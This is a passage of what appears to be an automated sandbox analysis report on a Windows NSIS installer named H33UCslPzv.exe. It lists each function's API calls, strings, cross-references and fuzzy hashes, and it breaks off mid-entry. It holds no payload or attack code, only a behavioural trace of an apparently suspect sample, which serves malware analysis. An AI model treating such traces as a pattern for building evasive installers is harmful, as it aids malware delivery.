Call, xrefs: 004038C8, 004038D0, 004038DD, 00403927, 0040392D
.exe, xrefs: 00403907
RichEd20, xrefs: 00403A27
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380F
_Nb, xrefs: 0040397D, 004039E5
RichEdit20A, xrefs: 00403A45, 00403A4B
Control Panel\Desktop\ResourceLocale, xrefs: 0040383E

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
API String ID: 1975747703-1475425850
Opcode ID: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
Opcode Fuzzy Hash: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DD5
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\H33UCslPzv.exe,00000400), ref: 00402DF1

Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00402E3D
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73

Strings

Error launching installer, xrefs: 00402E14
C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
Null, xrefs: 00402EBB
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
Inst, xrefs: 00402EA9
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
C:\Users\user\Desktop\H33UCslPzv.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00402DC4
soft, xrefs: 00402EB2

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\H33UCslPzv.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1509689379
Opcode ID: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
Instruction ID: 59d678f17646e0847602a4e6c91a81595dbc35b8f9b1ca6258d7792959114811
Opcode Fuzzy Hash: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
Instruction Fuzzy Hash: 0F510971900216AFDB109F64CE89B9E7BB8EB55355F10403BF904B62C1C7BC9E81AB5D

Function 0040600F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040613A
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000), ref: 0040614D
SHGetSpecialFolderLocation.SHELL32(0040514C,76F923A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000), ref: 00406189
SHGetPathFromIDListA.SHELL32(76F923A0,Call), ref: 00406197
CoTaskMemFree.OLE32(76F923A0), ref: 004061A3
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00000000,00798F00,76F923A0), ref: 00406219

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll, xrefs: 00406034
Call, xrefs: 00406039, 00406106, 00406107, 00406108, 00406124, 00406139, 0040614C, 00406168, 00406193, 004061C6, 004061CC, 004061E4, 004061F7, 00406212, 00406218, 00406220, 0040624A
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004061C1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406109

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3376052695
Opcode ID: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
Opcode Fuzzy Hash: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Strings

C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsx6761.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp$C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian$Call
API String ID: 1941528284-3312956367
Opcode ID: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
Opcode Fuzzy Hash: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

Function 00405114 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll, xrefs: 00405134, 00405146, 0040514C, 0040516F, 0040517B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll
API String ID: 2531174081-2952521951
Opcode ID: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
Opcode Fuzzy Hash: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

Function 00402FFB Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403062
GetTickCount.KERNEL32 ref: 004030E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040310F
wsprintfA.USER32 ref: 0040311F

Strings

... %d%%, xrefs: 00403119
s=y, xrefs: 004030AC, 004030BE

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$s=y
API String ID: 551687249-665027819
Opcode ID: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
Instruction ID: 7192b2bd781d1e73c4002c8dab31bcfd9076020614228c7b813c8c88a4a42f55
Opcode Fuzzy Hash: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
Instruction Fuzzy Hash: 63517931901209ABCB10DF65DA44A9F7BBCEF18766F14413BE810BB2D0C7799B41CBA9

Function 004055DA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
GetLastError.KERNEL32 ref: 00405631
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
GetLastError.KERNEL32 ref: 00405650

Strings

C:\Users\user\Desktop, xrefs: 004055DA
C:\Users\user\AppData\Local\Temp\, xrefs: 00405600

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1729097607
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9

Function 00406317 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
wsprintfA.USER32 ref: 00406367
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B

Strings

%s%s.dll, xrefs: 00406361
\, xrefs: 0040633F
UXTHEME, xrefs: 00406320

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

Function 0040206A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F

Strings

/z, xrefs: 004020DF

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: /z
API String ID: 2987980305-1190999251
Opcode ID: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
Opcode Fuzzy Hash: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

Function 00405BB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

